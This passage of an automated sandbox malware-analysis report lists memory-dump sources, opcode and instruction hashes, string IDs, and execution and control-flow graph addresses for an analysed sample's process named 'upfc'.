                                                      • Instruction ID: d757702dd5d5df1c17d65b41af02f433d9c512b01fedf05a728ebd3ddb10a8d4
                                                      • Opcode Fuzzy Hash: c2f9a43a3e202649a4026ef8806b21b406c16f3f06bca05c6ccecb1836bb0331
                                                      • Instruction Fuzzy Hash: FFB01200C7640F01A544367B0846064F0406B4C230FD40070D80C50083A8CE109C0262
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1313005289.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1790000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction ID: 85e5956da6019c02cb3c63999fd8d7e82736a99af89d6a8b6ec8b105dc193566
                                                      • Opcode Fuzzy Hash: 4240f07aa1fa7878a1268ac9f6d40dffa0b3b3bb61059715db6846cbbd43602e
                                                      • Instruction Fuzzy Hash: 20B00204C5650B01E61435BB1D86569F5605B4D174FD511B0D81D405C798CD55BE5273
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317947383.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1b80000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24fa99bf1a9cea87bf3803ee56cd94af1776e6381781cbe679543a0bf130eacf
                                                      • Instruction ID: 0af08622831f9e0b6a45436e3fd71e6dc5f4691fb90b50ab897846d88c4431ab
                                                      • Opcode Fuzzy Hash: 24fa99bf1a9cea87bf3803ee56cd94af1776e6381781cbe679543a0bf130eacf
                                                      • Instruction Fuzzy Hash: A022B330A1CA599FFB48FF28C45A6B9B7A1FF99320F54017ED40DC3293DE6468528B91
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317947383.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff7c1b80000_62b1bf60394248d2c743ec6df0935d58e5009c9e04aab.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 755956d58b109f958545df45671f8fdb47f506f5eaf118dfb29af89451f081d4
                                                      • Instruction ID: 440164532dde152e8695eee5ed138b51f127f04496a9299d9aed50a8dc73ef68
                                                      • Opcode Fuzzy Hash: 755956d58b109f958545df45671f8fdb47f506f5eaf118dfb29af89451f081d4
                                                      • Instruction Fuzzy Hash: 3571AF709186598FEB49EF68C494AADBBF1FF48310F50067AD04ADB2D2DF74A845CB80

                                                      Execution Graph

                                                      Execution Coverage:4.6%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:25%
                                                      Total number of Nodes:20
                                                      Total number of Limit Nodes:3
                                                      execution_graph 30035 7ff7c17d2aa8 30036 7ff7c17d7760 30035->30036 30042 7ff7c17d72e0 30036->30042 30038 7ff7c17d778e 30041 7ff7c17d77fc 30038->30041 30046 7ff7c17d7388 30038->30046 30040 7ff7c17d77f0 30043 7ff7c17ee5f0 FindCloseChangeNotification 30042->30043 30045 7ff7c17ee674 30043->30045 30045->30038 30048 7ff7c17d8090 30046->30048 30047 7ff7c17d8245 30048->30047 30051 7ff7c17d7080 30048->30051 30050 7ff7c17d816f 30050->30040 30052 7ff7c17d84c0 30051->30052 30055 7ff7c17d7088 30052->30055 30054 7ff7c17d84c9 30054->30050 30057 7ff7c17d84f0 30055->30057 30056 7ff7c17d9041 30056->30054 30057->30056 30058 7ff7c17d91e3 GetSystemInfo 30057->30058 30059 7ff7c17d921e 30058->30059 30059->30054

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 59 7ff7c1b821c7-7ff7c1b821cd 60 7ff7c1b821ef-7ff7c1b82200 59->60 61 7ff7c1b821cf-7ff7c1b821d3 59->61 64 7ff7c1b8237a-7ff7c1b82395 60->64 65 7ff7c1b82206-7ff7c1b8221b 60->65 62 7ff7c1b821d9-7ff7c1b821ea 61->62 63 7ff7c1b822d3-7ff7c1b822e4 61->63 66 7ff7c1b82331-7ff7c1b82345 62->66 68 7ff7c1b822eb-7ff7c1b822f6 63->68 69 7ff7c1b822e6 63->69 76 7ff7c1b8239d 64->76 77 7ff7c1b82397 64->77 65->64 67 7ff7c1b82221-7ff7c1b8222d 65->67 70 7ff7c1b8234c-7ff7c1b82357 66->70 71 7ff7c1b82347 66->71 73 7ff7c1b8225e-7ff7c1b82274 call 7ff7c1b81b70 67->73 74 7ff7c1b8222f-7ff7c1b82246 call 7ff7c1b80680 67->74 69->68 71->70 73->63 86 7ff7c1b82276-7ff7c1b82281 73->86 74->63 83 7ff7c1b8224c-7ff7c1b8225b call 7ff7c1b807b0 74->83 80 7ff7c1b823a1-7ff7c1b82403 76->80 81 7ff7c1b8239f 76->81 77->76 103 7ff7c1b8240e-7ff7c1b8242c 80->103 104 7ff7c1b823cb-7ff7c1b82407 80->104 81->80 84 7ff7c1b823e1-7ff7c1b823e3 81->84 83->73 90 7ff7c1b8242e-7ff7c1b82460 84->90 91 7ff7c1b823e5-7ff7c1b82400 84->91 86->64 89 7ff7c1b82287-7ff7c1b8229c 86->89 89->64 93 7ff7c1b822a2-7ff7c1b822b5 89->93 99 7ff7c1b82548-7ff7c1b8254d 90->99 97 7ff7c1b82309-7ff7c1b82311 93->97 98 7ff7c1b822b7-7ff7c1b822d1 call 7ff7c1b80680 93->98 102 7ff7c1b82319-7ff7c1b8231c 97->102 98->63 111 7ff7c1b822f7-7ff7c1b82306 call 7ff7c1b807b0 98->111 120 7ff7c1b8247c-7ff7c1b82557 99->120 121 7ff7c1b82561-7ff7c1b8257f 99->121 108 7ff7c1b82323-7ff7c1b8232b 102->108 104->84 108->66 113 7ff7c1b8216a-7ff7c1b82177 108->113 111->97 113->108 116 7ff7c1b8217d-7ff7c1b82191 113->116 116->108 131 7ff7c1b8252d-7ff7c1b82545 120->131 132 7ff7c1b824a6-7ff7c1b824a9 120->132 131->99 132->131 133 7ff7c1b824af-7ff7c1b824b2 132->133 134 7ff7c1b8251b-7ff7c1b82522 133->134 135 7ff7c1b824b4-7ff7c1b824e1 133->135 136 7ff7c1b82524-7ff7c1b8252c 134->136 137 7ff7c1b824e2-7ff7c1b824fc 134->137 139 7ff7c1b82502-7ff7c1b8250d 137->139 140 7ff7c1b82581-7ff7c1b825a8 137->140 139->140 141 
7ff7c1b8250f-7ff7c1b82519 139->141 144 7ff7c1b825aa-7ff7c1b825d1 140->144 145 7ff7c1b825d4-7ff7c1b826b8 140->145 141->134 162 7ff7c1b8264d-7ff7c1b82696 call 7ff7c1b826c2 145->162 163 7ff7c1b82677-7ff7c1b826c0 call 7ff7c1b826c2 145->163 173 7ff7c1b82686-7ff7c1b8268c 163->173
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: ce59deba66772b7d73b4ba27355089940c02bb4a64216de7c130eb1b8f91249c
                                                      • Instruction ID: c85197cca4ecfcb91fb9551dabd8763d475fda3dee54daa4bfb6c82bb35be3eb
                                                      • Opcode Fuzzy Hash: ce59deba66772b7d73b4ba27355089940c02bb4a64216de7c130eb1b8f91249c
                                                      • Instruction Fuzzy Hash: 45F1E23090CE468FE758EF18C4915B9B7A1FF44720BA415BED44EC3A83DAA9B841CF61

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: 4845580825ac02183d184a707e1d35f42f5cff3c073928bb2d21b03221461cc4
                                                      • Instruction ID: db4aae2398d0b39b89d345fb8d5e67fdb5433a1326b1da56740c07f4a322eb47
                                                      • Opcode Fuzzy Hash: 4845580825ac02183d184a707e1d35f42f5cff3c073928bb2d21b03221461cc4
                                                      • Instruction Fuzzy Hash: D3D1263090CB468FE358EF28D491575F7E1FF44728BA4157EC44EC3A92DAA9B8428F61

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: 952cf8f1a7529dd96a3f0c9bc76369dff04acbc57bcc4eff3b3193f6f16b8b17
                                                      • Instruction ID: ff3ab29681879012470236429417a56880eb4727b9d663a7d283e5409066aa79
                                                      • Opcode Fuzzy Hash: 952cf8f1a7529dd96a3f0c9bc76369dff04acbc57bcc4eff3b3193f6f16b8b17
                                                      • Instruction Fuzzy Hash: 2EC19D30A08A4A9FE749EF28C4906A5B7A1FF58750F94517EC44EC7E86CB68F851CF90

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: a1dd210c9cdb723d61e8265989d17817d997c591e09cec69f7f771b7e5d9c957
                                                      • Instruction ID: 6470914be634c3c7b14dcb78e55ca571d6e7d4cbc4a449d1947d4fd113f0476b
                                                      • Opcode Fuzzy Hash: a1dd210c9cdb723d61e8265989d17817d997c591e09cec69f7f771b7e5d9c957
                                                      • Instruction Fuzzy Hash: 37A1C03090CA468FE749EF28C5946A4F7A1FF15324F9451BDC44EC7A86CB68B891CFA0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: fedc6acb2cb61cb7e60c3a30f05a82ac5d4be618900120065b2a72672c183a2e
                                                      • Instruction ID: 51407bdc4bb495d3df0d938571249886e4c30e35cb6a3ae4c92894ce78e39acd
                                                      • Opcode Fuzzy Hash: fedc6acb2cb61cb7e60c3a30f05a82ac5d4be618900120065b2a72672c183a2e
                                                      • Instruction Fuzzy Hash: 6431F63190C741CFF3197E298905075BBE0EF4A768B64257FD4CEC7593E99874428BA1

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: df30c3950fb19baceb92186b6f7acdce0a98dbc6fc1c014859addcafbfba0272
                                                      • Instruction ID: d53a1fb380eebf54d567bbad3fcdd5a1edb0d922c0fce0fba2a6104236c324ec
                                                      • Opcode Fuzzy Hash: df30c3950fb19baceb92186b6f7acdce0a98dbc6fc1c014859addcafbfba0272
                                                      • Instruction Fuzzy Hash: 5C110431E08A0A4EEB54BE25C8114F6B3D1FF583A0B90053AE04EC76D3DE68F94587A0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: 56abd15d00c2944a2847cd205d38faee3fca2ab3f0c3ed8c0644cb3f7d501d04
                                                      • Instruction ID: 981765f3c18c68d76ca356ced75bf597c5582dfb856246d331d810cb42bc7de2
                                                      • Opcode Fuzzy Hash: 56abd15d00c2944a2847cd205d38faee3fca2ab3f0c3ed8c0644cb3f7d501d04
                                                      • Instruction Fuzzy Hash: D011C431E0CA0A8FEB55FE25D4115F6B3D1EF583A5B90053AE00EC75D3DE68B84587A0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: cba800141b725f593c5046494a41a4ce08b346d045e5490bf25f14674b940bef
                                                      • Instruction ID: 48c2e47d1fc24cd44936bf65d840c2aa5d2d198f5486a8b33d60b0703a47542b
                                                      • Opcode Fuzzy Hash: cba800141b725f593c5046494a41a4ce08b346d045e5490bf25f14674b940bef
                                                      • Instruction Fuzzy Hash: CA114C326085068FF705AE08D4552E57390EF543E1F50053FD409C76D1DEA5E9848BB0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6$)S6
                                                      • API String ID: 0-4226688195
                                                      • Opcode ID: e50abe4a96ec8906f1e6ee7cc4862c13a8cbed61ac6793d6f506b297e1c25b72
                                                      • Instruction ID: 25d063d4dc1b66778194e6578b2f24d140a7e11881d09be9ff83f9694dfa3674
                                                      • Opcode Fuzzy Hash: e50abe4a96ec8906f1e6ee7cc4862c13a8cbed61ac6793d6f506b297e1c25b72
                                                      • Instruction Fuzzy Hash: 73112532A0850A8FE705AE08D4122E57390EF583A5F90053FD40AC7AD2EEA5A8808BA0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: 13870747db82a837a1425f20602134f90bb472ba89c8779873f738885975d1dc
                                                      • Instruction ID: 5a682a6a2913874410209eebd349f47b0e2f8e10f256aec0636171ec7654a8b4
                                                      • Opcode Fuzzy Hash: 13870747db82a837a1425f20602134f90bb472ba89c8779873f738885975d1dc
                                                      • Instruction Fuzzy Hash: 63F1B2709186468FEB48DF18C4E46B4B7A1FF45310F9451BDC84E8B68ADB78E882CF91

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: b7c8a2624616a298c4f8b92146fb75c5d6f4e4521a441ad44573c4ac07557c03
                                                      • Instruction ID: ef329df11ba843bbc74834ccb3886c177fdd4ad5d1b65176ab77c379454f4931
                                                      • Opcode Fuzzy Hash: b7c8a2624616a298c4f8b92146fb75c5d6f4e4521a441ad44573c4ac07557c03
                                                      • Instruction Fuzzy Hash: 67F1BF709195458FEB49DF18C4D06B4B7A1FF4A310B9456BDC84ECBA8ACA78F881CF90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17c1000_upfc.jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseFindNotification
                                                      • String ID:
                                                      • API String ID: 2591292051-0
                                                      • Opcode ID: f101a1c4709ff254966f8261eb5df4cfdb854842bc3eab4445806296da5294f5
                                                      • Instruction ID: 48364a170a5a117d828ae1e5664a026f4b4adc848b18f9d0cff2c5b3dcadc7f1
                                                      • Opcode Fuzzy Hash: f101a1c4709ff254966f8261eb5df4cfdb854842bc3eab4445806296da5294f5
                                                      • Instruction Fuzzy Hash: 1231F37190CA898FD718EB6888097A9BBA0FF55320F1481AFD049C3193DA61A455CBD1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: 3e94fe719e1324c04e4ebaf3f19f77d7687963dcab3d67d84f3ffc44fcfe0483
                                                      • Instruction ID: 43e6cf6a4abecf40c56e4ec962e255d7d75511c7fefbd0bdb584bab79212704c
                                                      • Opcode Fuzzy Hash: 3e94fe719e1324c04e4ebaf3f19f77d7687963dcab3d67d84f3ffc44fcfe0483
                                                      • Instruction Fuzzy Hash: 9FC1AF705195468FEB09DF08D4E05B5B7A1FF46320B9456BDC89F8BA8BCA78E481CF50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: )S6
                                                      • API String ID: 0-807267689
                                                      • Opcode ID: 3f75bc0b4b2c4a25fa34a7a994775a20f98a68207db0ccf7284da37a6b1e430b
                                                      • Instruction ID: b492aa31a28a1670c12d63b3b46182609df5e7f4ce57f47d457f49b3452d2f45
                                                      • Opcode Fuzzy Hash: 4e2ee881d680e3b9354482e051fd49afe6d1631cb6190e9a84b96eee16dac0fd
                                                      • Instruction Fuzzy Hash: 1C41603160C9498FDB48EF28C499EA4F3E1FFA9320B14026AD00EC3692CE34F855CB81
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1fa45554fd146803ffe0628ee4a6ba628d38fb8405e9ddae21b1af9c9e57ef7
                                                      • Instruction ID: d3918d7fc949ef56bf63bb34b28a04cd00a9a3d363164349044f33635f6ffde4
                                                      • Opcode Fuzzy Hash: d1fa45554fd146803ffe0628ee4a6ba628d38fb8405e9ddae21b1af9c9e57ef7
                                                      • Instruction Fuzzy Hash: 8C411A3560C9499FDB88EF28C495AA5B3E1FFA9320B1405AAD00EC3692DE35F855CB81
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d49867a30479c50f79946d15ba11b3345fc86f3582e73c4fae7224a3762d29da
                                                      • Instruction ID: 9b4ad1c0e72a6ae5086112e2a43da609e4b6cb73fe4f2b2bdf9a8ea44726b337
                                                      • Opcode Fuzzy Hash: d49867a30479c50f79946d15ba11b3345fc86f3582e73c4fae7224a3762d29da
                                                      • Instruction Fuzzy Hash: D721A63130CC184FE768EA1CE88ADB977D1EB9932171501BAE58AC7266ED51EC9287C1
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ef4d97dd2639910337e24407ce474e33fc886600ec5d80fa2344e61a2732fc92
                                                      • Instruction ID: 4578caff4540e17c9a08870f56540087d1dfbd4a862ee2ae59bd51824a49f54c
                                                      • Opcode Fuzzy Hash: ef4d97dd2639910337e24407ce474e33fc886600ec5d80fa2344e61a2732fc92
                                                      • Instruction Fuzzy Hash: B4316B706089498FDB89EF28C498EA5B3E1FF69310B1406AED01EC7292CE30F855CB81
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cbebefcd13a07a3f660fa0057882243a17ba182eb4d8edb1e582dae057dbae23
                                                      • Instruction ID: 489fa761fdd562e60e9485dd93c158c05d1f2c085288301f972952950a053282
                                                      • Opcode Fuzzy Hash: cbebefcd13a07a3f660fa0057882243a17ba182eb4d8edb1e582dae057dbae23
                                                      • Instruction Fuzzy Hash: 513170306089488FDB4DEF28C058EA4B7E1FFA931171406AAD00EC7692CE34F855CB81
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8afb2f6241ccea42320a4dc92b521ed47a23421fecb5d5613e7d4b295d53ceb
                                                      • Instruction ID: 9b72cf491f54d34a68b2c5dac61be41d3656bca523b294f049c61a73a2bc2d51
                                                      • Opcode Fuzzy Hash: e8afb2f6241ccea42320a4dc92b521ed47a23421fecb5d5613e7d4b295d53ceb
                                                      • Instruction Fuzzy Hash: D2310512E0CA655BE314B77C645E7F9A785DF48375F14457BD04DC62A3CE68B8818284
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C17B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C17B1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c17b1000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6e16a77b228e5801ba1b023d8022086ad352fd5527326006c99a10ae7675bfe
                                                      • Instruction ID: 2aa817fade72a91f733caa76c06e5ebefb0495bd3097d3b1fe503daed3412c23
                                                      • Opcode Fuzzy Hash: d6e16a77b228e5801ba1b023d8022086ad352fd5527326006c99a10ae7675bfe
                                                      • Instruction Fuzzy Hash: 334159A448F3C16FC703AB754C345A2BFB89E5712A71D85EBE0D5CA0A3D64C295AC323
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f5c03f56f2914b16a95d27d571f7a7bfd2959932e36b5c6e151c1d9eb304d9a
                                                      • Instruction ID: cae0bc6cdfbf67eecc84350cc0c101fe1a19fd6041b13f071a616c0e6b913f40
                                                      • Opcode Fuzzy Hash: 7f5c03f56f2914b16a95d27d571f7a7bfd2959932e36b5c6e151c1d9eb304d9a
                                                      • Instruction Fuzzy Hash: A1314C746089498FDB4CEF28C099EA4B7E1FFA9310B1446AAD00EC7692CE34F855CB81
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 98a7f9b5d77b94cb7166ba7135db602d1d83c5ae80daa188e6efb28eade09219
                                                      • Instruction ID: 55b129a46d23bed0dbdbb7f593cf62839db644c085d963395185592493edf330
                                                      • Opcode Fuzzy Hash: 98a7f9b5d77b94cb7166ba7135db602d1d83c5ae80daa188e6efb28eade09219
                                                      • Instruction Fuzzy Hash: 36313A706089499FDB98EF28C499EA5B3E1FF69310B1406ADD00EC7692CF34F855CB81
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2547403812.00007FF7C1CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1CA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1ca0000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42b2d7f6bbc08e34ae93c2180690560c2eea2e66f51b01152903ada4e336b56e
                                                      • Instruction ID: f16381b5ac8d082bca6f563eeba1252440462b0a047afd0a35c4e786b47b0755
                                                      • Opcode Fuzzy Hash: 42b2d7f6bbc08e34ae93c2180690560c2eea2e66f51b01152903ada4e336b56e
                                                      • Instruction Fuzzy Hash: 2231F532A08A1D8FEB65EB18D8546ECB7E1FB98330F55017BE40ED3292CD695C5687D0
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2538433781.00007FF7C1790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1790000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1790000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2c17f4060b1c88c64378346ca0fca0d50390cd54406f2496741d42caba532c8
                                                      • Instruction ID: 266f9470073b824c60f554db7d43638643f96ce5a5b0098f2a535c3519c39d34
                                                      • Opcode Fuzzy Hash: a2c17f4060b1c88c64378346ca0fca0d50390cd54406f2496741d42caba532c8
                                                      • Instruction Fuzzy Hash: B331847190D64A8FDB45EB79C8599A9BBF0FF1B320F4405FAC019CB2E3DA68A845C750
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2544752682.00007FF7C1B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1B80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff7c1b80000_upfc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0956876679bc13096153af99d9f5827bbe7b2d9f5e603aa852ceb54e77157ae5
                                                      • Instruction ID: bae3b25347795f248908c69a21f7af0b35c26808ca94670afe24f8dbdeba23bf
